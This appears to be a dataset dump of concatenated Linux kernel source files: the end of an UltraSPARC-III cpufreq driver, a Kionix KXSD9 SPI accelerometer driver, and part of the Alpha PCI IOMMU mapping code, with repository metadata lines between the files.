			     : "r" (val), "i" (ASI_SAFARI_CONFIG)
			     : "memory");
}
/* Translate the Safari config divider field into the CPU's current
 * frequency in kHz (base clock-tick rate divided by 1, 2 or 32).
 * Any other divider encoding is a hardware/driver inconsistency -> BUG().
 */
static unsigned long get_current_freq(unsigned int cpu, unsigned long safari_cfg)
{
	unsigned long clock_tick = sparc64_get_clock_tick(cpu) / 1000;
	unsigned long divisor;

	switch (safari_cfg & SAFARI_CFG_DIV_MASK) {
	case SAFARI_CFG_DIV_1:
		divisor = 1;
		break;
	case SAFARI_CFG_DIV_2:
		divisor = 2;
		break;
	case SAFARI_CFG_DIV_32:
		divisor = 32;
		break;
	default:
		BUG();
	}

	return clock_tick / divisor;
}
/* Report the current frequency (kHz) of the given CPU.  The Safari config
 * register is per-CPU, so the current task is temporarily pinned to the
 * target CPU for the read, then its original affinity is restored.
 */
static unsigned int us3_freq_get(unsigned int cpu)
{
	cpumask_t cpus_allowed;
	unsigned long reg;
	unsigned int ret;

	cpumask_copy(&cpus_allowed, tsk_cpus_allowed(current));
	set_cpus_allowed_ptr(current, cpumask_of(cpu));

	reg = read_safari_cfg();
	ret = get_current_freq(cpu, reg);

	set_cpus_allowed_ptr(current, &cpus_allowed);

	return ret;
}
/* cpufreq target_index callback: program the Safari clock divider for the
 * policy's CPU.  index selects the frequency-table entry (0 = /1, 1 = /2,
 * 2 = /32).  Runs pinned to the target CPU since the register is per-CPU;
 * affinity is restored before returning.  Always returns 0.
 */
static int us3_freq_target(struct cpufreq_policy *policy, unsigned int index)
{
	unsigned int cpu = policy->cpu;
	unsigned long new_bits, new_freq, reg;
	cpumask_t cpus_allowed;

	cpumask_copy(&cpus_allowed, tsk_cpus_allowed(current));
	set_cpus_allowed_ptr(current, cpumask_of(cpu));

	new_freq = sparc64_get_clock_tick(cpu) / 1000;
	switch (index) {
	case 0:
		new_bits = SAFARI_CFG_DIV_1;
		new_freq /= 1;
		break;
	case 1:
		new_bits = SAFARI_CFG_DIV_2;
		new_freq /= 2;
		break;
	case 2:
		new_bits = SAFARI_CFG_DIV_32;
		new_freq /= 32;
		break;

	default:
		BUG();
	}

	/* Read-modify-write only the divider field. */
	reg = read_safari_cfg();
	reg &= ~SAFARI_CFG_DIV_MASK;
	reg |= new_bits;
	write_safari_cfg(reg);

	set_cpus_allowed_ptr(current, &cpus_allowed);

	return 0;
}
/* cpufreq init callback: fill this CPU's 4-entry frequency table with the
 * /1, /2 and /32 rates derived from the clock tick, terminate it, and hand
 * it to the cpufreq core for validation.
 */
static int __init us3_freq_cpu_init(struct cpufreq_policy *policy)
{
	unsigned int cpu = policy->cpu;
	unsigned long clock_tick = sparc64_get_clock_tick(cpu) / 1000;
	struct cpufreq_frequency_table *table =
		&us3_freq_table[cpu].table[0];

	table[0].driver_data = 0;
	table[0].frequency = clock_tick / 1;
	table[1].driver_data = 1;
	table[1].frequency = clock_tick / 2;
	table[2].driver_data = 2;
	table[2].frequency = clock_tick / 32;
	table[3].driver_data = 0;
	table[3].frequency = CPUFREQ_TABLE_END;

	policy->cpuinfo.transition_latency = 0;
	policy->cur = clock_tick;

	return cpufreq_table_validate_and_show(policy, table);
}
/* cpufreq exit callback: restore the full-speed (divide-by-1) setting,
 * but only if the driver was actually registered.
 */
static int us3_freq_cpu_exit(struct cpufreq_policy *policy)
{
	if (cpufreq_us3_driver)
		us3_freq_target(policy, 0);

	return 0;
}
/* Module init: verify we are on a supported UltraSPARC-III family chip
 * (Cheetah / Cheetah+ / Jaguar / Panther, identified via the %ver
 * register), then allocate the driver and per-CPU frequency tables and
 * register with the cpufreq core.  On any failure all allocations are
 * released and the error code is returned; -ENODEV on unsupported CPUs.
 */
static int __init us3_freq_init(void)
{
	unsigned long manuf, impl, ver;
	int ret;

	if (tlb_type != cheetah && tlb_type != cheetah_plus)
		return -ENODEV;

	__asm__("rdpr %%ver, %0" : "=r" (ver));
	manuf = ((ver >> 48) & 0xffff);
	impl  = ((ver >> 32) & 0xffff);

	if (manuf == CHEETAH_MANUF &&
	    (impl == CHEETAH_IMPL ||
	     impl == CHEETAH_PLUS_IMPL ||
	     impl == JAGUAR_IMPL ||
	     impl == PANTHER_IMPL)) {
		struct cpufreq_driver *driver;

		ret = -ENOMEM;
		driver = kzalloc(sizeof(*driver), GFP_KERNEL);
		if (!driver)
			goto err_out;

		us3_freq_table = kzalloc((NR_CPUS * sizeof(*us3_freq_table)),
			GFP_KERNEL);
		if (!us3_freq_table)
			goto err_out;

		driver->init = us3_freq_cpu_init;
		driver->verify = cpufreq_generic_frequency_table_verify;
		driver->target_index = us3_freq_target;
		driver->get = us3_freq_get;
		driver->exit = us3_freq_cpu_exit;
		strcpy(driver->name, "UltraSPARC-III");

		cpufreq_us3_driver = driver;
		ret = cpufreq_register_driver(driver);
		if (ret)
			goto err_out;

		return 0;

err_out:
		/* driver may be NULL here only on the first allocation
		   failure; kfree(NULL) below is a no-op for the table. */
		if (driver) {
			kfree(driver);
			cpufreq_us3_driver = NULL;
		}
		kfree(us3_freq_table);
		us3_freq_table = NULL;
		return ret;
	}

	return -ENODEV;
}
/* Module exit: unregister from cpufreq and release the driver struct and
 * the per-CPU frequency tables.  A no-op if init never registered.
 */
static void __exit us3_freq_exit(void)
{
	if (!cpufreq_us3_driver)
		return;

	cpufreq_unregister_driver(cpufreq_us3_driver);
	kfree(cpufreq_us3_driver);
	cpufreq_us3_driver = NULL;
	kfree(us3_freq_table);
	us3_freq_table = NULL;
}
MODULE_AUTHOR("David S. Miller <davem@redhat.com>");
MODULE_DESCRIPTION("cpufreq driver for UltraSPARC-III");
MODULE_LICENSE("GPL");
module_init(us3_freq_init);
module_exit(us3_freq_exit);
| gpl-2.0 |
Zaphod-Beeblebrox/kernel_rockchip_rk3188 | drivers/staging/iio/accel/kxsd9.c | 2306 | 9012 | /*
* kxsd9.c simple support for the Kionix KXSD9 3D
* accelerometer.
*
* Copyright (c) 2008-2009 Jonathan Cameron <jic23@cam.ac.uk>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* The i2c interface is very similar, so shouldn't be a problem once
* I have a suitable wire made up.
*
* TODO: Support the motion detector
* Uses register address incrementing so could have a
* heavily optimized ring buffer access function.
*/
#include <linux/device.h>
#include <linux/kernel.h>
#include <linux/spi/spi.h>
#include <linux/sysfs.h>
#include <linux/slab.h>
#include "../iio.h"
#include "../sysfs.h"
#include "../adc/adc.h"
#include "accel.h"
#define KXSD9_REG_X 0x00
#define KXSD9_REG_Y 0x02
#define KXSD9_REG_Z 0x04
#define KXSD9_REG_AUX 0x06
#define KXSD9_REG_RESET 0x0a
#define KXSD9_REG_CTRL_C 0x0c
#define KXSD9_FS_8 0x00
#define KXSD9_FS_6 0x01
#define KXSD9_FS_4 0x02
#define KXSD9_FS_2 0x03
#define KXSD9_FS_MASK 0x03
#define KXSD9_REG_CTRL_B 0x0d
#define KXSD9_REG_CTRL_A 0x0e
#define KXSD9_READ(a) (0x80 | (a))
#define KXSD9_WRITE(a) (a)
#define KXSD9_SCALE_2G "0.011978"
#define KXSD9_SCALE_4G "0.023927"
#define KXSD9_SCALE_6G "0.035934"
#define KXSD9_SCALE_8G "0.047853"
#define KXSD9_STATE_RX_SIZE 2
#define KXSD9_STATE_TX_SIZE 4
/**
* struct kxsd9_state - device related storage
* @buf_lock: protect the rx and tx buffers.
* @indio_dev: associated industrial IO device
* @us: spi device
* @rx: single rx buffer storage
* @tx: single tx buffer storage
**/
struct kxsd9_state {
struct mutex buf_lock;
struct iio_dev *indio_dev;
struct spi_device *us;
u8 *rx;
u8 *tx;
};
/* This may want to move to mili g to allow for non integer ranges */
/* sysfs read for the accel scale: read CTRL_C over SPI and print the scale
 * string matching the currently configured full-scale range (2/4/6/8 g).
 * Returns bytes written to buf, or a negative errno on SPI failure.
 */
static ssize_t kxsd9_read_scale(struct device *dev,
				struct device_attribute *attr,
				char *buf)
{
	int ret;
	ssize_t len = 0;
	struct iio_dev *indio_dev = dev_get_drvdata(dev);
	struct kxsd9_state *st = indio_dev->dev_data;
	struct spi_transfer xfer = {
		.bits_per_word = 8,
		.len = 2,
		.cs_change = 1,
		.tx_buf = st->tx,
		.rx_buf = st->rx,
	};
	struct spi_message msg;

	/* buf_lock protects the shared rx/tx DMA buffers. */
	mutex_lock(&st->buf_lock);
	st->tx[0] = KXSD9_READ(KXSD9_REG_CTRL_C);
	st->tx[1] = 0;
	spi_message_init(&msg);
	spi_message_add_tail(&xfer, &msg);
	ret = spi_sync(st->us, &msg);
	if (ret)
		goto error_ret;

	/* rx[1] holds CTRL_C; the FS bits select the range.  All four mask
	   values are covered, so no default case is needed. */
	switch (st->rx[1] & KXSD9_FS_MASK) {
	case KXSD9_FS_8:
		len += sprintf(buf, "%s\n", KXSD9_SCALE_8G);
		break;
	case KXSD9_FS_6:
		len += sprintf(buf, "%s\n", KXSD9_SCALE_6G);
		break;
	case KXSD9_FS_4:
		len += sprintf(buf, "%s\n", KXSD9_SCALE_4G);
		break;
	case KXSD9_FS_2:
		len += sprintf(buf, "%s\n", KXSD9_SCALE_2G);
		break;
	}

error_ret:
	mutex_unlock(&st->buf_lock);

	return ret ? ret : len;
}
/* sysfs write for the accel scale: match the user string against the four
 * known scale constants, then read-modify-write the FS bits of CTRL_C.
 *
 * NOTE(review): the comparisons use strncmp over min(strlen(buf),
 * strlen(scale)), which accepts prefixes (e.g. "0.0" matches the first
 * constant tried) — presumably tolerated for sysfs trailing newlines;
 * consider sysfs_streq.  TODO confirm before changing.
 *
 * Returns len on success, -EINVAL for an unrecognized string, or a
 * negative errno on SPI failure.
 */
static ssize_t kxsd9_write_scale(struct device *dev,
				 struct device_attribute *attr,
				 const char *buf,
				 size_t len)
{
	struct spi_message msg;
	int ret;
	struct iio_dev *indio_dev = dev_get_drvdata(dev);
	struct kxsd9_state *st = indio_dev->dev_data;
	u8 val;
	struct spi_transfer xfers[] = {
		{
			.bits_per_word = 8,
			.len = 2,
			.cs_change = 1,
			.tx_buf = st->tx,
			.rx_buf = st->rx,
		}, {
			.bits_per_word = 8,
			.len = 2,
			.cs_change = 1,
			.tx_buf = st->tx,
		},
	};

	if (!strncmp(buf, KXSD9_SCALE_8G,
		     strlen(buf) < strlen(KXSD9_SCALE_8G)
		     ? strlen(buf) : strlen(KXSD9_SCALE_8G)))
		val = KXSD9_FS_8;
	else if (!strncmp(buf, KXSD9_SCALE_6G,
			  strlen(buf) < strlen(KXSD9_SCALE_6G)
			  ? strlen(buf) : strlen(KXSD9_SCALE_6G)))
		val = KXSD9_FS_6;
	else if (!strncmp(buf, KXSD9_SCALE_4G,
			  strlen(buf) < strlen(KXSD9_SCALE_4G)
			  ? strlen(buf) : strlen(KXSD9_SCALE_4G)))
		val = KXSD9_FS_4;
	else if (!strncmp(buf, KXSD9_SCALE_2G,
			  strlen(buf) < strlen(KXSD9_SCALE_2G)
			  ? strlen(buf) : strlen(KXSD9_SCALE_2G)))
		val = KXSD9_FS_2;
	else
		return -EINVAL;

	mutex_lock(&st->buf_lock);
	/* First transfer: read current CTRL_C. */
	st->tx[0] = KXSD9_READ(KXSD9_REG_CTRL_C);
	st->tx[1] = 0;
	spi_message_init(&msg);
	spi_message_add_tail(&xfers[0], &msg);
	ret = spi_sync(st->us, &msg);
	if (ret)
		goto error_ret;
	/* Second transfer: write it back with the new FS bits. */
	st->tx[0] = KXSD9_WRITE(KXSD9_REG_CTRL_C);
	st->tx[1] = (st->rx[1] & ~KXSD9_FS_MASK) | val;

	spi_message_init(&msg);
	spi_message_add_tail(&xfers[1], &msg);
	ret = spi_sync(st->us, &msg);
error_ret:
	mutex_unlock(&st->buf_lock);
	return ret ? ret : len;
}
/* sysfs read for one axis (or AUX): send the register address (kept on the
 * per-attribute 'address'), wait 200us, then clock out the two data bytes.
 * The 12-bit sample sits in the top bits: high byte << 8 plus the upper
 * nibble of the low byte.  Returns bytes written to buf or negative errno.
 */
static ssize_t kxsd9_read_accel(struct device *dev,
				struct device_attribute *attr,
				char *buf)
{
	struct spi_message msg;
	int ret;
	ssize_t len = 0;
	u16 val;
	struct iio_dev_attr *this_attr = to_iio_dev_attr(attr);
	struct iio_dev *indio_dev = dev_get_drvdata(dev);
	struct kxsd9_state *st = indio_dev->dev_data;
	struct spi_transfer xfers[] = {
		{
			.bits_per_word = 8,
			.len = 1,
			.cs_change = 0,
			.delay_usecs = 200,
			.tx_buf = st->tx,
		}, {
			.bits_per_word = 8,
			.len = 2,
			.cs_change = 1,
			.rx_buf = st->rx,
		},
	};

	mutex_lock(&st->buf_lock);
	st->tx[0] = KXSD9_READ(this_attr->address);
	spi_message_init(&msg);
	spi_message_add_tail(&xfers[0], &msg);
	spi_message_add_tail(&xfers[1], &msg);
	ret = spi_sync(st->us, &msg);
	if (ret)
		goto error_ret;
	val = (((u16)(st->rx[0])) << 8) | (st->rx[1] & 0xF0);
	len = sprintf(buf, "%d\n", val);
error_ret:
	mutex_unlock(&st->buf_lock);
	return ret ? ret : len;
}
static IIO_DEV_ATTR_ACCEL_X(kxsd9_read_accel, KXSD9_REG_X);
static IIO_DEV_ATTR_ACCEL_Y(kxsd9_read_accel, KXSD9_REG_Y);
static IIO_DEV_ATTR_ACCEL_Z(kxsd9_read_accel, KXSD9_REG_Z);
static IIO_DEV_ATTR_IN_RAW(0, kxsd9_read_accel, KXSD9_REG_AUX);
static IIO_DEVICE_ATTR(accel_scale,
S_IRUGO | S_IWUSR,
kxsd9_read_scale,
kxsd9_write_scale,
0);
static IIO_CONST_ATTR(accel_scale_available,
KXSD9_SCALE_2G " "
KXSD9_SCALE_4G " "
KXSD9_SCALE_6G " "
KXSD9_SCALE_8G);
static struct attribute *kxsd9_attributes[] = {
&iio_dev_attr_accel_x_raw.dev_attr.attr,
&iio_dev_attr_accel_y_raw.dev_attr.attr,
&iio_dev_attr_accel_z_raw.dev_attr.attr,
&iio_dev_attr_in0_raw.dev_attr.attr,
&iio_dev_attr_accel_scale.dev_attr.attr,
&iio_const_attr_accel_scale_available.dev_attr.attr,
NULL,
};
static const struct attribute_group kxsd9_attribute_group = {
.attrs = kxsd9_attributes,
};
/* Power up the device: one SPI message with two writes, CTRL_B = 0x40
 * (take the part out of standby) and CTRL_C = 0x9b.  Uses heap buffers
 * rather than the stack because SPI buffers must be DMA-safe.
 * Returns 0 on success or a negative errno.
 */
static int __devinit kxsd9_power_up(struct spi_device *spi)
{
	int ret;
	struct spi_transfer xfers[2] = {
		{
			.bits_per_word = 8,
			.len = 2,
			.cs_change = 1,
		}, {
			.bits_per_word = 8,
			.len = 2,
			.cs_change = 1,
		},
	};
	struct spi_message msg;
	u8 *tx2;
	u8 *tx = kmalloc(2, GFP_KERNEL);

	if (tx == NULL) {
		ret = -ENOMEM;
		goto error_ret;
	}
	tx2 = kmalloc(2, GFP_KERNEL);
	if (tx2 == NULL) {
		ret = -ENOMEM;
		goto error_free_tx;
	}
	/* Use the register macros instead of the raw 0x0d / 0x0c values. */
	tx[0] = KXSD9_WRITE(KXSD9_REG_CTRL_B);
	tx[1] = 0x40;
	tx2[0] = KXSD9_WRITE(KXSD9_REG_CTRL_C);
	tx2[1] = 0x9b;
	xfers[0].tx_buf = tx;
	xfers[1].tx_buf = tx2;
	spi_message_init(&msg);
	spi_message_add_tail(&xfers[0], &msg);
	spi_message_add_tail(&xfers[1], &msg);
	ret = spi_sync(spi, &msg);

	kfree(tx2);
error_free_tx:
	kfree(tx);
error_ret:
	return ret;
}
static const struct iio_info kxsd9_info = {
.attrs = &kxsd9_attribute_group,
.driver_module = THIS_MODULE,
};
/* SPI probe: allocate the driver state and its DMA-safe rx/tx buffers,
 * register the IIO device, then configure SPI mode 0 and power the part
 * up.  Error paths unwind allocations in reverse order via gotos.
 */
static int __devinit kxsd9_probe(struct spi_device *spi)
{
	struct kxsd9_state *st;
	int ret = 0;

	st = kzalloc(sizeof(*st), GFP_KERNEL);
	if (st == NULL) {
		ret = -ENOMEM;
		goto error_ret;
	}
	spi_set_drvdata(spi, st);

	st->rx = kmalloc(sizeof(*st->rx)*KXSD9_STATE_RX_SIZE,
			 GFP_KERNEL);
	if (st->rx == NULL) {
		ret = -ENOMEM;
		goto error_free_st;
	}
	st->tx = kmalloc(sizeof(*st->tx)*KXSD9_STATE_TX_SIZE,
			 GFP_KERNEL);
	if (st->tx == NULL) {
		ret = -ENOMEM;
		goto error_free_rx;
	}

	st->us = spi;
	mutex_init(&st->buf_lock);
	st->indio_dev = iio_allocate_device(0);
	if (st->indio_dev == NULL) {
		ret = -ENOMEM;
		goto error_free_tx;
	}
	st->indio_dev->dev.parent = &spi->dev;
	st->indio_dev->info = &kxsd9_info;
	st->indio_dev->dev_data = (void *)(st);
	st->indio_dev->modes = INDIO_DIRECT_MODE;

	ret = iio_device_register(st->indio_dev);
	if (ret)
		goto error_free_dev;

	spi->mode = SPI_MODE_0;
	spi_setup(spi);
	/* NOTE(review): the power-up result is ignored here; a failed
	   power-up leaves a registered but unpowered device. */
	kxsd9_power_up(spi);

	return 0;

error_free_dev:
	iio_free_device(st->indio_dev);
error_free_tx:
	kfree(st->tx);
error_free_rx:
	kfree(st->rx);
error_free_st:
	kfree(st);
error_ret:
	return ret;
}
/* SPI remove: tear down in reverse order of probe — unregister the IIO
 * device, then free the DMA buffers and the state structure.
 */
static int __devexit kxsd9_remove(struct spi_device *spi)
{
	struct kxsd9_state *state = spi_get_drvdata(spi);

	iio_device_unregister(state->indio_dev);
	kfree(state->rx);
	kfree(state->tx);
	kfree(state);

	return 0;
}
static struct spi_driver kxsd9_driver = {
.driver = {
.name = "kxsd9",
.owner = THIS_MODULE,
},
.probe = kxsd9_probe,
.remove = __devexit_p(kxsd9_remove),
};
/* Module init: register the driver with the SPI core. */
static __init int kxsd9_spi_init(void)
{
	return spi_register_driver(&kxsd9_driver);
}
/* Module exit: unregister the driver from the SPI core. */
static __exit void kxsd9_spi_exit(void)
{
	spi_unregister_driver(&kxsd9_driver);
}
MODULE_AUTHOR("Jonathan Cameron <jic23@cam.ac.uk>");
MODULE_DESCRIPTION("Kionix KXSD9 SPI driver");
MODULE_LICENSE("GPL v2");
| gpl-2.0 |
dineshram/linux-media-si4713USBDriver | arch/alpha/kernel/pci_iommu.c | 2306 | 25873 | /*
* linux/arch/alpha/kernel/pci_iommu.c
*/
#include <linux/kernel.h>
#include <linux/mm.h>
#include <linux/pci.h>
#include <linux/gfp.h>
#include <linux/bootmem.h>
#include <linux/export.h>
#include <linux/scatterlist.h>
#include <linux/log2.h>
#include <linux/dma-mapping.h>
#include <linux/iommu-helper.h>
#include <asm/io.h>
#include <asm/hwrpb.h>
#include "proto.h"
#include "pci_impl.h"
#define DEBUG_ALLOC 0
#if DEBUG_ALLOC > 0
# define DBGA(args...) printk(KERN_DEBUG args)
#else
# define DBGA(args...)
#endif
#if DEBUG_ALLOC > 1
# define DBGA2(args...) printk(KERN_DEBUG args)
#else
# define DBGA2(args...)
#endif
#define DEBUG_NODIRECT 0
#define ISA_DMA_MASK 0x00ffffff
/* Build an IOMMU pte from a physical address: the address shifted right by
 * PAGE_SHIFT-1 leaves the page frame number in bits 1 and up, and OR-ing 1
 * sets the valid bit in bit 0.
 */
static inline unsigned long
mk_iommu_pte(unsigned long paddr)
{
	return (paddr >> (PAGE_SHIFT-1)) | 1;
}
/* Return the minimum of MAX or the first power of two larger
than main memory. */
unsigned long
size_for_memory(unsigned long max)
{
	unsigned long mem = max_low_pfn << PAGE_SHIFT;
	/* If main memory is smaller than MAX, shrink MAX to the next
	   power of two at or above the memory size. */
	if (mem < max)
		max = roundup_pow_of_two(mem);
	return max;
}
/* Allocate and initialize a PCI IOMMU arena of WINDOW_SIZE bytes for HOSE,
 * with its pte table allocated (preferably) on NUMA node NID.  The arena
 * alignment is raised to at least the pte-table size because the TLB lookup
 * concatenates rather than adds.  On DISCONTIGMEM kernels, node-local
 * allocation failures fall back to system-wide bootmem.
 */
struct pci_iommu_arena * __init
iommu_arena_new_node(int nid, struct pci_controller *hose, dma_addr_t base,
		     unsigned long window_size, unsigned long align)
{
	unsigned long mem_size;
	struct pci_iommu_arena *arena;

	/* One pte (unsigned long) per page of the window. */
	mem_size = window_size / (PAGE_SIZE / sizeof(unsigned long));

	/* Note that the TLB lookup logic uses bitwise concatenation,
	   not addition, so the required arena alignment is based on
	   the size of the window.  Retain the align parameter so that
	   particular systems can over-align the arena. */
	if (align < mem_size)
		align = mem_size;

#ifdef CONFIG_DISCONTIGMEM

	arena = alloc_bootmem_node(NODE_DATA(nid), sizeof(*arena));
	if (!NODE_DATA(nid) || !arena) {
		printk("%s: couldn't allocate arena from node %d\n"
		       "    falling back to system-wide allocation\n",
		       __func__, nid);
		arena = alloc_bootmem(sizeof(*arena));
	}

	arena->ptes = __alloc_bootmem_node(NODE_DATA(nid), mem_size, align, 0);
	if (!NODE_DATA(nid) || !arena->ptes) {
		printk("%s: couldn't allocate arena ptes from node %d\n"
		       "    falling back to system-wide allocation\n",
		       __func__, nid);
		arena->ptes = __alloc_bootmem(mem_size, align, 0);
	}

#else /* CONFIG_DISCONTIGMEM */

	arena = alloc_bootmem(sizeof(*arena));
	arena->ptes = __alloc_bootmem(mem_size, align, 0);

#endif /* CONFIG_DISCONTIGMEM */

	spin_lock_init(&arena->lock);
	arena->hose = hose;
	arena->dma_base = base;
	arena->size = window_size;
	arena->next_entry = 0;

	/* Align allocations to a multiple of a page size.  Not needed
	   unless there are chip bugs. */
	arena->align_entry = 1;

	return arena;
}
/* Non-NUMA convenience wrapper: allocate the arena on node 0. */
struct pci_iommu_arena * __init
iommu_arena_new(struct pci_controller *hose, dma_addr_t base,
		unsigned long window_size, unsigned long align)
{
	return iommu_arena_new_node(0, hose, base, window_size, align);
}
/* Must be called with the arena lock held */
/* Must be called with the arena lock held */
/* Find N consecutive free ptes in ARENA, aligned per MASK (mask+1 must be
 * a power of two) and respecting DEV's DMA segment boundary.  Scans from
 * next_entry; on reaching the end once, flushes the IOMMU TLB and retries
 * from the start before giving up.  Returns the first pte index, or -1.
 */
static long
iommu_arena_find_pages(struct device *dev, struct pci_iommu_arena *arena,
		       long n, long mask)
{
	unsigned long *ptes;
	long i, p, nent;
	int pass = 0;
	unsigned long base;
	unsigned long boundary_size;

	base = arena->dma_base >> PAGE_SHIFT;
	/* Boundary (in pages) the mapping must not cross; default 4GB. */
	if (dev) {
		boundary_size = dma_get_seg_boundary(dev) + 1;
		boundary_size >>= PAGE_SHIFT;
	} else {
		boundary_size = 1UL << (32 - PAGE_SHIFT);
	}

	/* Search forward for the first mask-aligned sequence of N free ptes */
	ptes = arena->ptes;
	nent = arena->size >> PAGE_SHIFT;
	p = ALIGN(arena->next_entry, mask + 1);
	i = 0;

again:
	while (i < n && p+i < nent) {
		/* Before committing to a candidate start, make sure the run
		   would not straddle the segment boundary. */
		if (!i && iommu_is_span_boundary(p, n, base, boundary_size)) {
			p = ALIGN(p + 1, mask + 1);
			goto again;
		}

		if (ptes[p+i])
			p = ALIGN(p + i + 1, mask + 1), i = 0;
		else
			i = i + 1;
	}

	if (i < n) {
		if (pass < 1) {
			/*
			 * Reached the end.  Flush the TLB and restart
			 * the search from the beginning.
			 */
			alpha_mv.mv_pci_tbi(arena->hose, 0, -1);

			pass++;
			p = 0;
			i = 0;
			goto again;
		} else
			return -1;
	}

	/* Success. It's the responsibility of the caller to mark them
	   in use before releasing the lock */
	return p;
}
/* Allocate N ptes from ARENA with the given alignment (in pte entries).
 * The entries are marked IOMMU_INVALID_PTE (non-zero, so no other allocator
 * can grab them, yet invalid so the IOMMU TLB cannot load them) until the
 * caller fills in real translations.  Returns the first index or -1.
 */
static long
iommu_arena_alloc(struct device *dev, struct pci_iommu_arena *arena, long n,
		  unsigned int align)
{
	unsigned long flags;
	unsigned long *ptes;
	long i, p, mask;

	spin_lock_irqsave(&arena->lock, flags);

	/* Search for N empty ptes */
	ptes = arena->ptes;
	mask = max(align, arena->align_entry) - 1;
	p = iommu_arena_find_pages(dev, arena, n, mask);
	if (p < 0) {
		spin_unlock_irqrestore(&arena->lock, flags);
		return -1;
	}

	/* Success.  Mark them all in use, ie not zero and invalid
	   for the iommu tlb that could load them from under us.
	   The chip specific bits will fill this in with something
	   kosher when we return.  */
	for (i = 0; i < n; ++i)
		ptes[p+i] = IOMMU_INVALID_PTE;

	arena->next_entry = p + n;
	spin_unlock_irqrestore(&arena->lock, flags);

	return p;
}
/*
 * Return N ptes starting at OFS to the free state.  A zero pte marks
 * a free slot; any required TLB flushing is the caller's business.
 */
static void
iommu_arena_free(struct pci_iommu_arena *arena, long ofs, long n)
{
	unsigned long *pte = arena->ptes + ofs;
	unsigned long *end = pte + n;

	while (pte < end)
		*pte++ = 0;
}
/*
 * True if the machine supports DAC addressing, and DEV can
 * make use of it given MASK.
 */
static int pci_dac_dma_supported(struct pci_dev *dev, u64 mask)
{
	dma_addr_t dac_offset = alpha_mv.pci_dac_offset;
	int ok;

	/* DAC works only when the platform defines a DAC offset at all
	   (non-zero) and the device's dma_mask covers that offset. */
	ok = (dac_offset != 0)
	     && ((dac_offset & dev->dma_mask) == dac_offset);

	DBGA("pci_dac_dma_supported %s from %pf\n",
	     ok ? "yes" : "no", __builtin_return_address(0));

	return ok;
}
/* Map a single buffer of the indicated size for PCI DMA in streaming
   mode.  The 32-bit PCI bus mastering address to use is returned.
   Once the device is given the dma address, the device owns this memory
   until either pci_unmap_single or pci_dma_sync_single is performed.

   Translation strategy, in order of preference: the direct-map
   window, DAC (if DAC_ALLOWED), then an IOMMU scatter-gather arena.
   Returns 0 on failure.  */
static dma_addr_t
pci_map_single_1(struct pci_dev *pdev, void *cpu_addr, size_t size,
		 int dac_allowed)
{
	struct pci_controller *hose = pdev ? pdev->sysdata : pci_isa_hose;
	dma_addr_t max_dma = pdev ? pdev->dma_mask : ISA_DMA_MASK;
	struct pci_iommu_arena *arena;
	long npages, dma_ofs, i;
	unsigned long paddr;
	dma_addr_t ret;
	unsigned int align = 0;
	struct device *dev = pdev ? &pdev->dev : NULL;

	paddr = __pa(cpu_addr);

#if !DEBUG_NODIRECT
	/* First check to see if we can use the direct map window. */
	if (paddr + size + __direct_map_base - 1 <= max_dma
	    && paddr + size <= __direct_map_size) {
		ret = paddr + __direct_map_base;

		DBGA2("pci_map_single: [%p,%zx] -> direct %llx from %pf\n",
		      cpu_addr, size, ret, __builtin_return_address(0));

		return ret;
	}
#endif

	/* Next, use DAC if selected earlier. */
	if (dac_allowed) {
		ret = paddr + alpha_mv.pci_dac_offset;

		DBGA2("pci_map_single: [%p,%zx] -> DAC %llx from %pf\n",
		      cpu_addr, size, ret, __builtin_return_address(0));

		return ret;
	}

	/* If the machine doesn't define a pci_tbi routine, we have to
	   assume it doesn't support sg mapping, and, since we tried to
	   use direct_map above, it now must be considered an error. */
	if (! alpha_mv.mv_pci_tbi) {
		printk_once(KERN_WARNING "pci_map_single: no HW sg\n");
		return 0;
	}

	/* Prefer the PCI arena; fall back to the ISA arena when the PCI
	   arena is absent or lies beyond the device's dma mask. */
	arena = hose->sg_pci;
	if (!arena || arena->dma_base + arena->size - 1 > max_dma)
		arena = hose->sg_isa;

	npages = iommu_num_pages(paddr, size, PAGE_SIZE);

	/* Force allocation to 64KB boundary for ISA bridges. */
	if (pdev && pdev == isa_bridge)
		align = 8;
	dma_ofs = iommu_arena_alloc(dev, arena, npages, align);
	if (dma_ofs < 0) {
		printk(KERN_WARNING "pci_map_single failed: "
		       "could not allocate dma page tables\n");
		return 0;
	}

	/* Fill the freshly allocated ptes with translations for each
	   page of the buffer. */
	paddr &= PAGE_MASK;
	for (i = 0; i < npages; ++i, paddr += PAGE_SIZE)
		arena->ptes[i + dma_ofs] = mk_iommu_pte(paddr);

	ret = arena->dma_base + dma_ofs * PAGE_SIZE;
	/* Re-apply the buffer's sub-page offset to the bus address. */
	ret += (unsigned long)cpu_addr & ~PAGE_MASK;

	DBGA2("pci_map_single: [%p,%zx] np %ld -> sg %llx from %pf\n",
	      cpu_addr, size, npages, ret, __builtin_return_address(0));

	return ret;
}
/* Helper for generic DMA-mapping functions. */
/*
 * Resolve a generic struct device to the pci_dev whose DMA properties
 * should govern the mapping.  May return NULL (the ISA-bus-master
 * case at the bottom) -- callers must tolerate that.
 */
static struct pci_dev *alpha_gendev_to_pci(struct device *dev)
{
	if (dev && dev->bus == &pci_bus_type)
		return to_pci_dev(dev);

	/* Assume that non-PCI devices asking for DMA are either ISA or EISA,
	   BUG() otherwise. */
	BUG_ON(!isa_bridge);

	/* Assume non-busmaster ISA DMA when dma_mask is not set (the ISA
	   bridge is bus master then). */
	if (!dev || !dev->dma_mask || !*dev->dma_mask)
		return isa_bridge;

	/* For EISA bus masters, return isa_bridge (it might have smaller
	   dma_mask due to wiring limitations). */
	if (*dev->dma_mask >= isa_bridge->dma_mask)
		return isa_bridge;

	/* This assumes ISA bus master with dma_mask 0xffffff. */
	return NULL;
}
/*
 * dma_map_ops .map_page hook: map OFFSET..OFFSET+SIZE of PAGE for
 * streaming DMA, permitting DAC addressing when the device supports
 * it.  Delegates to pci_map_single_1().
 */
static dma_addr_t alpha_pci_map_page(struct device *dev, struct page *page,
				     unsigned long offset, size_t size,
				     enum dma_data_direction dir,
				     struct dma_attrs *attrs)
{
	struct pci_dev *pdev = alpha_gendev_to_pci(dev);
	int dac_allowed;

	BUG_ON(dir == PCI_DMA_NONE);

	/* Note the NULL-safe pdev test: alpha_gendev_to_pci() can
	   return NULL for ISA bus masters. */
	dac_allowed = pdev ? pci_dac_dma_supported(pdev, pdev->dma_mask) : 0;
	return pci_map_single_1(pdev, (char *)page_address(page) + offset,
				size, dac_allowed);
}
